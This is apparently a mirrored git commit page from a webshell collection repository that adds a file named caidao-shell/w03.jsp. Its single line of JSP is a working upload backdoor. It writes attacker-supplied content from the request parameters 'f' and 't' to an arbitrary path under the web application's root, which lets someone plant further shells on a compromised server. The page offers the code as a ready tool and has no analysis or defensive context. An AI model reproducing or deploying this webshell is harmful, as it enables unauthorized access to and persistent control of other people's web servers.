mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
Create w03.jsp
This commit is contained in:
parent
486f74dfb5
commit
6ce74b0f3d
1 changed files with 1 additions and 0 deletions
1
caidao-shell/w03.jsp
Normal file
1
caidao-shell/w03.jsp
Normal file
|
@ -0,0 +1 @@
|
|||
<%new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")).write(request.getParameter("t").replace("testtesttest","").getBytes());%>
|
Loading…
Reference in a new issue